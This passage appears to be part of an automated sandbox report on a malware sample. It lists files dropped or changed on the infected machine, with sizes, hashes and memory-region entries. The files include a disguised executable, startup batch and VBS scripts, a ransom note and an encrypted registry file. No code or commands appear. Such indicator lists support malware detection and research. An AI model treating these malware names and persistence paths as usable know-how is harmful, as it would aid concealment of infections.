SHA25670c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA51281b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5439b5e04ca18c7fb02cf406e6eb24167
SHA1e0c5bb6216903934726e3570b7d63295b9d28987
SHA256247d0658695a1eb44924a32363906e37e9864ba742fe35362a71f3a520ad2654
SHA512d0241e397060eebd4535197de4f1ae925aa88ae413a3a9ded6e856b356c4324dfd45dddfef9a536f04e4a258e8fe5dc1586d92d1d56b649f75ded8eddeb1f3e2
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5a8e767fd33edd97d306efb6905f93252
SHA1a6f80ace2b57599f64b0ae3c7381f34e9456f9d3
SHA256c8077a9fc79e2691ef321d556c4ce9933ca0570f2bbaa32fa32999dfd5f908bb
SHA51207b748582fe222795bce74919aa06e9a09025c14493edb6f3b1f112d9a97ac2225fe0904cac9adf2a62c98c42f7877076e409803014f0afd395f4cc8be207241
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
5KB
MD5849978e4c0325ec6e7d4c6a0a895f6df
SHA1b1adb09a56dc68f61f5c944ee0b573eca47367a7
SHA2564b060af277ba04ceb630615a9656ef81f32c10dce6c923e248088b42eea2c1b9
SHA512369aed9fb47a3a3e6915183100a8557f61fc5bd21c0629bea37bba4b856eec99276b0cadeefb4735d1845d5240f49c69e75e0b204455c09fd603d5fa71865b27
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD562ad9f96a2e85ba032774f000afcbcd5
SHA1d19bdb0fce7d127579f64f164908fb93eaf7c200
SHA2569fbba29cd86ec418c4cc98e4576300f4d679f534f33fd078de56b9ff5243eefc
SHA51245404b716077f7b75b4b2e4f5b8852b5e96a94de1ce850aab703a1bbaae0a32c4567dee5db9b397754f18d26659caf76c1a7776ce9de460aac8a10b9ef22c94d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD55542cf28963c74a53ed2551e0f4c525c
SHA1b710e5ecf0da306c1916c6a5a2923c2f84c76350
SHA256e86aeb7880f2f9c6704ab458b94389f7621f97abaf5ae75501604b7100723e5e
SHA51200c08963546f2aad6419c690fe48978a60d7bf314b8bdd250c5c664aaf36d82b286a698232fb599f4de7382a6ac9f1dafce119cae44b7bc86e165f05ec4f9620
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
11KB
MD550f0c807fcdf3619137ba4a584edf548
SHA187e8fbd7d5d2aeb9572ddcc01c4a38373b0e95f5
SHA25696b4a11889ad0816b8e196cdfeb1e19a8df5846b9fb3286fab8df5cc938539ce
SHA51229bf643d94c3504bfa59ed5398e6c870e7e0ded23e359090d5cf22c51a74bda7cffb91cb23d1ce9052505e8e80a5900b337c7faeb74d30c2a8bb0ae20584a95f
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
11KB
MD5e313496412fefbd487e8da7d93f5be78
SHA165ceb6947748440103f4345584a85765b095ac9e
SHA2568421c3e986569aee19a0a9acb262b02a2d5d4da316529a8088f7285eadb4a4c8
SHA512bcc7fac9b4e5a4402bd55ca4f6a2e53422c830d3134095c19158a802ac4cc79645286eeb2f54c9b94bceb07a2c1b5f15149c5d4a41808ad4358a7b29638bcd17
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5d0a40a2d16d62c60994d5bb5624a589b
SHA130f0a77f10518a09d83e6185d6c4cde23e4de8af
SHA256c213a4024e89a0240d0b1fa3b18ea3db3db7bbe7ca1bdeed86dce9c2c4991ef8
SHA512cecef5087f194a83948880e36445324406218f6877386d6db7850b8f97ac107e042ea9445bb7e73c6e6a2c7da9782b7dae8caba0a1c997677d096b3271a4cac0
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5d771de020a08527e71e3f36b2e8cd62a
SHA13023a9387de2502170d66773d4eb7f23fb155633
SHA25665280b191b81b71435edfaea9625a1db4600b1c49140aae5def659cc73b20d80
SHA5121d585a15797f5d6fe0a715431ae9733e3d382d75e5c372f9d212f0e2955ca6f0e27dc70093c51890982db1d3f2a19fa2f7089c2eade77b08403eb83966b920a3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5d28a889fd956d5cb3accfbaf1143eb6f
SHA1157ba54b365341f8ff06707d996b3635da8446f7
SHA25621e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA5120b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5c1b0a9f26c3e1786191e94e419f1fbf9
SHA17f3492f4ec2d93e164f43fe2606b53edcffd8926
SHA256796649641966f606d7217bb94c5c0a6194eef518815dacc86feacdd78d3c1113
SHA512fa0290d77372c26a2f14cb9b0002c222bc757ce7ad02516b884c59a1108f42eb4c76884f9edb6c7149f7c3fac917eda99b72a3b1d72b7e118a1d5a73cadd15a8
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pfi1atfd.yca.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\seroxen.lib.exeFilesize
10KB
MD557a21007e4a8f423332f8e19b24081cd
SHA1affc966362ddba697047e31e46b57c5da07a8135
SHA25630db07f044a1f35c28ddbd111b1bf457db53555e464b2d60704c9e8023801c95
SHA512e66dd63bb78e36f2c6d4dab62d0dd653d74eda19bcd834f358386dcef1cd60413fc4943be5766b547986ab4f28ea9b18e9e829008cdd00aa51afd5b4d6ac533b
-
C:\Users\Admin\AppData\Local\Temp\steamwebhelper.exeFilesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
C:\Users\Admin\AppData\Roaming\startup_str_164.batFilesize
91KB
MD5520c1190bbbe3a7359a6e72f76618245
SHA150d5e441a97aad127e8d5ad8c28c848b3be02c5d
SHA25691813779ab003d08ee337226c9ba845aaca64098e9740e6aaf30a0c8fa833ee0
SHA51298ebc8ee9b1b1d7302a5771f1e6b174903a9c249459a98e57e8cd48ce8760997b414246c7c9f05d1ce08fa299dcc2496c389b4126af647e8f2a6e9f81d15f749
-
C:\Users\Admin\AppData\Roaming\startup_str_164.vbsFilesize
115B
MD5d205a237870aa23dc12fc98f1f45d49a
SHA1292da3b980b6505376cba759b2253c8f1cefc7c6
SHA2561d9e9b82693d1be7c72ccaace065b82ed70debd5ca63624bec87f61480822334
SHA5127e613b45174f6d5ff7f7332b39d3a95c1874aecd8bfe603625c5852c8ac4d992330f2f38cfc03e01250226c647f841ba66529e57aa9d52a2882f4311c8ff8b80
-
C:\Users\Admin\Desktop\How To Decrypt My Files.htmlFilesize
632B
MD55b8c1f3e4a0e50e44dca4d16c3a09b8c
SHA1ddd88605d5f3ad24ca878fb27b011fabebff741b
SHA256db3ff1d4c3855db878d1217051ec64d096c38d4b067587345e5b06f6c0c9f5f7
SHA5129eb4b1bf8481e8f4b1c31b5f161de563806d29ca05285a35b5d2cb7cf555d516bf23b060ecaa9ecd1dc7653f2ab5164ed1e6e8e8fef5d29d7189a2233736f1bf
-
C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms.ENCFilesize
16B
MD506469a74c28d1b5f39999a3a54eb356a
SHA1b2d5f211b3a4eb53f06e432b5aad81caf90930b3
SHA256393b36795513f3ab9625b4dcd988cb2b77a0d8e72378c9c632c632c8eaacd9d8
SHA512071c2d5461ceb9f80d4cf375410ad156a21fcdb8433a445ba020ee2102887c99d1823645d7aef270c4f619f1588a405f6c12bd822e854817a686b5f3c44e33ee
-
\??\pipe\LOCAL\crashpad_1868_OEQYIURTMLMWBTNJMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/1156-129-0x0000015969E60000-0x0000015969E6C000-memory.dmpFilesize
48KB
-
memory/1156-51-0x00000159699F0000-0x0000015969A06000-memory.dmpFilesize
88KB
-
memory/1156-369-0x00000159699D0000-0x00000159699DA000-memory.dmpFilesize
40KB
-
memory/1156-387-0x0000015969C00000-0x0000015969C0A000-memory.dmpFilesize
40KB
-
memory/1156-131-0x000001594F550000-0x000001594F55C000-memory.dmpFilesize
48KB
-
memory/1156-388-0x000001596A3E0000-0x000001596A3EA000-memory.dmpFilesize
40KB
-
memory/2240-0-0x00007FFEC3173000-0x00007FFEC3175000-memory.dmpFilesize
8KB
-
memory/2240-1-0x00007FFEC3170000-0x00007FFEC3C31000-memory.dmpFilesize
10.8MB
-
memory/2240-38-0x00007FFEC3170000-0x00007FFEC3C31000-memory.dmpFilesize
10.8MB
-
memory/2240-13-0x000002361A710000-0x000002361A726000-memory.dmpFilesize
88KB
-
memory/2240-12-0x000002361A6E0000-0x000002361A6E8000-memory.dmpFilesize
32KB
-
memory/2240-7-0x000002367E040000-0x000002367E062000-memory.dmpFilesize
136KB
-
memory/4392-128-0x00000223F8410000-0x00000223F8486000-memory.dmpFilesize
472KB
-
memory/4392-127-0x00000223F7F80000-0x00000223F7FC4000-memory.dmpFilesize
272KB
-
memory/4808-15-0x00007FFEC3170000-0x00007FFEC3C31000-memory.dmpFilesize
10.8MB
-
memory/4808-29-0x00007FFEC3170000-0x00007FFEC3C31000-memory.dmpFilesize
10.8MB
-
memory/4808-25-0x00007FFEC3170000-0x00007FFEC3C31000-memory.dmpFilesize
10.8MB
-
memory/4808-26-0x00007FFEC3170000-0x00007FFEC3C31000-memory.dmpFilesize
10.8MB
-
memory/5064-62-0x0000000000410000-0x0000000000418000-memory.dmpFilesize
32KB